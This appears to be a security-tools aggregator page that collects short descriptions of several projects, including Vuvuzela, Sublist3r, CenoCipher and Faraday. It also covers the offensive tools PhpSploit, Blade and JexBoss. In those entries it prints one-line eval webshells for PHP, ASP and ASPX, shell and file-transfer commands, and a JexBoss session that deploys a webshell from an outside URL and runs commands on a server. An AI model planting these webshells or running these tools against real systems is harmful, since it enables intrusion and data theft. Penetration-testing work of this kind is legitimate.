Vuvuzela - Private Messaging System That Hides Metadata

Vuvuzela is a messaging system that protects the privacy of message contents and message metadata. Users communicating through Vuvuzela do not reveal who they are talking to, even in the presence of powerful nation-state adversaries. Our SOSP 2015 paper explains the system, its threat model, performance, limitations, and more. Our SOSP 2015 slides give a more graphical overview of the system. 

Vuvuzela is the first system that provides strong metadata privacy while scaling to millions of users. Previous systems that hide metadata using Tor (such as Pond ) are prone to traffic analysis attacks. Systems that encrypt metadata using techniques like DC-nets and PIR don't scale beyond thousands of users.

Vuvuzela uses efficient cryptography ( NaCl ) to hide as much metadata as possible and adds noise to metadata that can't be encrypted efficiently. This approach provides less privacy than encrypting all of the metadata, but it enables Vuvuzela to support millions of users. Nonetheless, Vuvuzela adds enough noise to thwart adversaries like the NSA and guarantees differential privacy for users' metadata.

Screenshots

A conversation in the Vuvuzela client

In practice, the message latency would be around 20s to 40s, depending on security parameters and the number of users connected to the system.

Noise generated by the Vuvuzela servers

Vuvuzela is unable to encrypt two kinds of metadata: the number of idle users (connected users without a conversation partner) and the number of active users (users engaged in a conversation). Without noise, a sophisticated adversary could use this metadata to learn who is talking to who. However, the Vuvuzela servers generate noise that perturbs this metadata so that it is difficult to exploit.

Usage
Follow these steps to run the Vuvuzela system locally using the provided sample configs.

1. Install Vuvuzela (assuming GOPATH=~/go , requires Go 1.4 or later):
   

   $ go get github.com/davidlazar/vuvuzela/...
   

   The remaining steps assume PATH contains ~/go/bin and that the current working directory is ~/go/src/github.com/davidlazar/vuvuzela .
   
2. Start the last Vuvuzela server:
   

   $ vuvuzela-server -conf confs/local-last.conf
   

3. Start the middle server (in a new shell):
   

   $ vuvuzela-server -conf confs/local-middle.conf
   

4. Start the first server (in a new shell):
   

   $ vuvuzela-server -conf confs/local-first.conf
   

5. Start the entry server (in a new shell):
   

   $ vuvuzela-entry-server -wait 1s
   

6. Run the Vuvuzela client:
   

   $ vuvuzela-client -conf confs/alice.conf
   

The client supports these commands:

• /dial <user> to dial another user
• /talk <user> to start a conversation
• /talk <yourself> to end a conversation

Deployment considerations
This Vuvuzela implementation is not ready for wide-use deployment. In particular, we haven't yet implemented these crucial components:

• Public Key Infrastructure : Vuvuzela assumes the existence of a PKI in which users can privately learn each others public keys. This implementation uses pki.conf as a placeholder until we integrate a real PKI.
  
• CDN to distribute dialing dead drops :Vuvuzela's dialing protocol (used to initiate conversations) uses a lot of server bandwidth. To make dialing practical, Vuvuzela should use a CDN or BitTorrent to distribute the dialing dead drops.
  

There is a lot more interesting work to do. See the issue tracker for more information.

Download Vuvuzela

Read More

Phpsploit - Stealth Post-Exploitation Framework

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable to maintain access to a compromised web server for privilege escalation purposes.

Overview

The obfuscated communication is accomplished using HTTP headers under standard client requests and web server's relative responses, tunneled through a tiny polymorphic backdoor :

<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>

Features

• Efficient : More than 20 plugins to automate post-exploitation tasks
  
  • Run commands and browse filesystem, bypassing PHP security restrictions
  • Upload/Download files between client and target
  • Edit remote files through local text editor
  • Run SQL console on target system
  • Spawn reverse TCP shells
• Stealth : The framework is made by paranoids, for paranoids
  
  • Nearly invisible by log analysis and NIDS signature detection
  • Safe-mode and common PHP security restrictions bypass
  • Communications are hidden in HTTP Headers
  • Loaded payloads are obfuscated to bypass NIDS
  • http/https/socks4/socks5 Proxy support
• Convenient : A robust interface with many crucial features
  
  • Cross-platform on both the client and the server.
  • Powerful interface with completion and multi-command support
  • Session saving/loading feature, with persistent history
  • Multi-request support for large payloads (such as uploads)
  • Provides a powerful, highly configurable settings engine
  • Each setting, such as user-agent has a polymorphic mode
  • Customisable environment variables for plugin interaction
  • Provides a complete plugin development API

Supported platforms

• GNU/Linux
• Mac OS X
• Windows (experimental)

Download Phpsploit

Read More

Blade - A Webshell Connection Tool With Customized WAF Bypass Payloads

Blade is a webshell connection tool based on console, currently under development and aims to be a choice of replacement of Chooper (中国菜刀). Chooper is a very cool webshell client with widly typies of server side scripts supported, but Chooper can only work on Windows opreation system, so this is the motivation of create another "Chooper" supporting Windows, Linux & Mac OS X. Blade is based on Python, so it allows users to modify the webshell connection payloads so that Blade can bypass some specified WAF which Chooper can not.

Major functions

Manage a web server with only one-line code on it, just like: <?php @eval($_REQUEST["cmd"]); ?>

PHP, ASP, ASPX & JSP supported.

Terminal Console provided.

File management & Dadabase management.

Features
Cross-plaform supported (Python needed)
Customizable WAF bypass payloads
Compatible with Chooper's server side scripts

Server side scripts examples
PHP:<?php @eval($_REQUEST["cmd"]); ?>
ASP: <%eval request("cmd")%>
ASPX:<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>

Usage
Get a shell:
python blade.py -u http://localhost/shell.php -s php -p cmd --shell
Download a file:
python blade.py -u http://localhost/shell.php -s php -p cmd --pull remote_path local_path
Upload a file:
python blade.py -u http://localhost/shell.php -s php -p cmd --push local_path remote_path

Current issues
Server side scripts supporting is not completed, currently only support PHP and ASP
Database management function is not completed, so can not connect databases

Download Blade

Read More

Sublist3R - Fast Subdomains Enumeration Tool For Penetration Testers

Sublist3r is python tool that is designed to enumerate subdomains of websites using search engines. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r currently supports the following search engines: Google, Yahoo, Bing, Baidu, and Ask. More search engines may be added in the future. Sublist3r also gathers subdomains using Netcraft and DNSdumpster.

subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.

Installation

git clone https://github.com/aboul3la/Sublist3r.git

Recommended Python Version:
The recommended python version to use is 2.7.x on any platform.
Other python versions maybe not supported at the moment.

Dependencies:

Requests library ( http://docs.python-requests.org/en/latest/ )

• Install for Ubuntu/Debian:

sudo apt-get install python-requests

• Install for Centos/Redhat:

sudo yum install python-requests

• Install using pip:

sudo pip install requests

dnspython library ( http://www.dnspython.org/ )

• Install for Ubuntu/Debian:

sudo apt-get install python-dnspython

• Install using pip:

sudo pip install dnspython

argparse library

• Install for Ubuntu/Debian:

sudo apt-get install python-argparse

• Install for Centos/Redhat:

sudo yum install python-argparse

• Install using pip:

sudo pip install argparse

Usage

Short Form	Long Form	Description
-d	--domain	Domain name to enumerate subdomains of
-b	--bruteforce	Enable the subbrute bruteforce module
-v	--verbose	Enable Verbosity and display results in realtime
-t	--threads	Number of threads to use for subbrute bruteforce
-o	--output	Save the results to text file
-h	--help	show the help message and exit

Examples

• To list all the basic options and switches use -h switch:

python sublist3r.py -h

• To enumerate subdomains of specific domain:

python sublist3r.py -d example.com

• To enumerate subdomains of specific domain and show results in realtime:

python sublist3r.py -v -d example.com

• To enumerate subdomains and use the subbrute bruteforce module:

python sublist3r.py -b -d example.com

Download Sublist3R

Read More

Nipe - Script To Redirect All Traffic From The Machine To The Tor Network

Script to redirect all the traffic from the machine to the Tor network.

    [+] AUTOR:        Vinicius Gouvea
    [+] EMAIL:        vini@inploit.com
    [+] BLOG:         https://medium.com/viniciusgouvea
    [+] GITHUB:       https://github.com/HeitorG
    [+] FACEBOOK:     https://fb.com/viniciushgouvea

Installing:

git clone https://github.com/HeitorG/nipe
cd nipe
cpan install  strict warnings Switch

Commands:

COMMAND          FUNCTION
install          For install.
start            To start
stop             To stop

Tested on:

• Ubuntu 14.10 and 15.04
• Busen Labs Hydrogen
• Debian Jessie 8.1 and Wheezy 7.9
• Lubuntu 15.04
• Xubuntu 15.04
• LionSec 3.0

Download Nipe

Read More

jSQL Injection v0.73 - Java Tool For Automatic SQL Database Injection.

jSQL Injection is a lightweight application used to find database information from a distant server.

jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).

jSQL is part of Kali Linux, the official new BackTrack penetration distribution.

jSQL is also included in Black Hat Sec, ArchAssault Project, BlackArch Linux and Cyborg Hawk Linux.

Change log

Coming... i18n arabic russian chinese integration, next db engines: SQLite Access MSDE...
v0.73 Authentication Basic Digest Negotiate NTLM and Kerberos, database type selection
v0.7 Batch scan, Github issue reporter, support for 16 db engines, optimized GUI
alpha-v0.6 Speed x 2 (no more hex encoding), 10 db vendors supported: MySQL Oracle SQLServer PostgreSQL DB2 Firebird Informix Ingres MaxDb Sybase. JUnit tests, log4j, i18n integration and more.
0.5 SQL shell, Uploader.
0.4 Admin page search, Brute force (md5 mysql...), Decoder (decode encode base64 hex md5...).
0.3 Distant file reader, Webshell drop, Terminal for webshell commands, Configuration backup, Update checker.
0.2 Time based algorithm, Multi-thread control (start pause resume stop), Shows URL calls.

Download jSQL Injection v0.73

Read More

CenoCipher - Easy-To-Use, End-To-End Encrypted Communications Tool

CenoCipher is a free, open-source, easy-to-use tool for exchanging secure encrypted communications over the internet. It uses strong cryptography to convert messages and files into encrypted cipher-data, which can then be sent to the recipient via regular email or any other channel available, such as instant messaging or shared cloud storage.

Features at a glance

• Simple for anyone to use. Just type a message, click Encrypt, and go
• Handles messages and file attachments together easily
• End-to-end encryption, performed entirely on the user's machine
• No dependence on any specific intermediary channel. Works with any communication method available
• Uses three strong cryptographic algorithms in combination to triple-protect data
• Optional steganography feature for embedding encrypted data within a Jpeg image
• No installation needed - fully portable application can be run from anywhere
• Unencrypted data is never written to disk - unless requested by the user
• Multiple input/output modes for convenient operation

Technical details

• Open source, written in C++
• AES/Rijndael, Twofish and Serpent ciphers (256-bit keysize variants), cascaded together in CTR mode for triple-encryption of messages and files
• HMAC-SHA-256 for construction of message authentication code
• PBKDF2-HMAC-SHA256 for derivation of separate AES, Twofish and Serpent keys from user-chosen passphrase
• Cryptographically safe pseudo-random number generator ISAAC for production of Initialization Vectors (AES/Twofish/Serpent) and Salts (PBKDF2)

Version History (Change Log)

Version 4.0 (December 05, 2015)

• Drastically overhauled and streamlined interface
• Added multiple input/output modes for cipher-data
• Added user control over unencrypted disk writes
• Added auto-decrypt and open-with support
• Added more entropy to Salt/IV generation

Version 3.0 (June 29, 2015)

• Added Serpent algorithm for cascaded triple-encryption
• Added steganography option for concealing data within Jpeg
• Added conversation mode for convenience
• Improved header obfuscation for higher security
• Increased entropy in generation of separate salt/IVs used by ciphers
• Many other enhancements under the hood

Version 2.1 (December 6, 2014)

• Change cascaded encryption cipher modes from CBC to CTR for extra security
• Improve PBKDF2 rounds determination and conveyance format
• Fix minor bug related to Windows DPI font scaling
• Fix minor bug affecting received filenames when saved by user

Version 2.0 (November 26, 2014)

• Initial open-source release
• Many enhancements to encryption algorithms and hash functions

Version 1.0 (June 10, 2014)

• Original program release (closed source / beta)

Download CenoCipher

Read More

JexBoss - Jboss Verify And Exploitation Tool

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server.

Requirements

• Python <= 2.7.x

Installation

To install the latest version of JexBoss, please use the following commands:

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
python jexboss.py

Features

The tool and exploits were developed and tested for versions 3, 4, 5 and 6 of the JBoss Application Server.
The exploitation vectors are:

• /jmx-console
  • tested and working in JBoss versions 4, 5 and 6
• /web-console/Invoker
  • tested and working in JBoss versions 4
• /invoker/JMXInvokerServlet
  • tested and working in JBoss versions 4 and 5

Usage example

• Check the file "demo.png"

$ git clone https://github.com/joaomatosf/jexboss.git
$ cd jexboss
$ python jexboss.py https://site-teste.com

 * --- JexBoss: Jboss verify and EXploitation Tool  --- *
 |                                                      |
 | @author:  João Filho Matos Figueiredo                |
 | @contact: joaomatosf@gmail.com                       |
 |                                                      |
 | @update: https://github.com/joaomatosf/jexboss       |
 #______________________________________________________#


 ** Checking Host: https://site-teste.com **

 * Checking web-console:           [ OK ]
 * Checking jmx-console:           [ VULNERABLE ]
 * Checking JMXInvokerServlet:         [ VULNERABLE ]


 * Do you want to try to run an automated exploitation via "jmx-console" ?
   This operation will provide a simple command shell to execute commands on the server..
   Continue only if you have permission!
   yes/NO ? yes

 * Sending exploit code to https://site-teste.com. Wait...


 * Info: This exploit will force the server to deploy the webshell 
   available on: http://www.joaomatosf.com/rnp/jbossass.war
 * Successfully deployed code! Starting command shell, wait...

 * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * 

 * https://site-teste.com: 

 Linux fwgw 2.6.32-431.29.2.el6.x86_64 #1 SMP Tue Sep 9 21:36:05 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

 CentOS release 6.5 (Final)

 uid=509(jboss) gid=509(jboss) grupos=509(jboss) context=system_u:system_r:initrc_t:s0

[Type commands or "exit" to finish]
Shell> pwd
/usr/jboss-6.1.0.Final/bin

[Type commands or "exit" to finish]
Shell> hostname
fwgw

[Type commands or "exit" to finish]
Shell> ls -all /tmp 
total 35436
drwxrwxrwt.  4 root root     4096 Nov 24 16:36 .
dr-xr-xr-x. 22 root root     4096 Nov 23 03:26 ..
-rw-r--r--.  1 root root 34630995 Out 15 18:07 snortrules-snapshot-2962.tar.gz
-rw-r--r--.  1 root root       32 Out 16 14:51 snortrules-snapshot-2962.tar.gz.md5
-rw-------.  1 root root        0 Set 20 16:45 yum.log
-rw-------.  1 root root     2743 Set 20 17:18 yum_save_tx-2014-09-20-17-18nQiKVo.yumtx
-rw-------.  1 root root     1014 Out  6 00:33 yum_save_tx-2014-10-06-00-33vig5iT.yumtx
-rw-------.  1 root root      543 Out  6 02:14 yum_save_tx-2014-10-06-02-143CcA5k.yumtx
-rw-------.  1 root root    18568 Out 14 03:04 yum_save_tx-2014-10-14-03-04Q9ywQt.yumtx
-rw-------.  1 root root      315 Out 15 16:00 yum_save_tx-2014-10-15-16-004hKzCF.yumtx

[Type commands or "exit" to finish]
Shell>

Download JexBoss

Read More

Faraday 1.0.16 - Collaborative Penetration Test and Vulnerability Management Platform

Faraday introduces a new concept - IPE (Integrated Penetration-Test Environment) a multiuser Penetration test IDE. Designed for distribution, indexation and analysis of the generated data during the process of a security audit.

This version comes with major changes to our Web UI, including the possibility to mark vulnerabilities as false positives. If you have a Pro or Corp license you can now create an Executive Report using only confirmed vulnerabilities, saving you even more time.

A brand new feature that comes with v1.0.16 is the ability to group vulnerabilities by any field in our Status Report view. Combine it with bulk edit to manage your findings faster than ever!

This release also features several new features developed entirely by our community. 

Changes:

* Added group vulnerabilities by any field in our Status Report

* Added port to Service type target in new vuln modal
* Filter false-positives in Dashboard, Status Report and Executive Report (Pro&Corp)

Filter in Status Report view

* Added Wiki information about running Faraday without configuring CouchDB https://github.com/infobyte/faraday/wiki/APIs
* Added parametrization for port configuration on APIs
* Added scripts to:
         - get all IPs from targets that have no services (/bin/getAllIpsNotServices.py)

/bin/getAllIpsNotServices.py

    - get all IP addresses that have defined open port (/bin/getAllbySrv.py) and get all IPs from targets without services (/bin/delAllVulnsWith.py)
            It's important to note that both these scripts hold a variable that you can modify to alter its behaviour. /bin/getAllbySrv.py has a port variable set to 8080 by default. /bin/delAllVulnsWith.py does the same with a RegExp
* Added three Plugins:
    - Immunity Canvas

Canvas configuration

    - Dig
    - Traceroute
* Refactor Plugin Base to update active WS name in var
* Refactor Plugins to use current WS in temp filename under $HOME/.faraday/data. Affected Plugins:
    - amap
    - dnsmap
    - nmap
    - sslcheck
    - wcscan
    - webfuzzer
    - nikto

Bug fixes:
* When the last workspace was null Faraday wouldn't start
* CSV export/import in QT
* Fixed bug that prevented the use of "reports" and "cwe" strings in Workspace names
* Unicode support in Nexpose-full Plugin
* Fixed bug get_installed_distributions from handler exceptions
* Fixed bug in first run of Faraday with log path and API errors

Download Faraday 1.0.16

Read More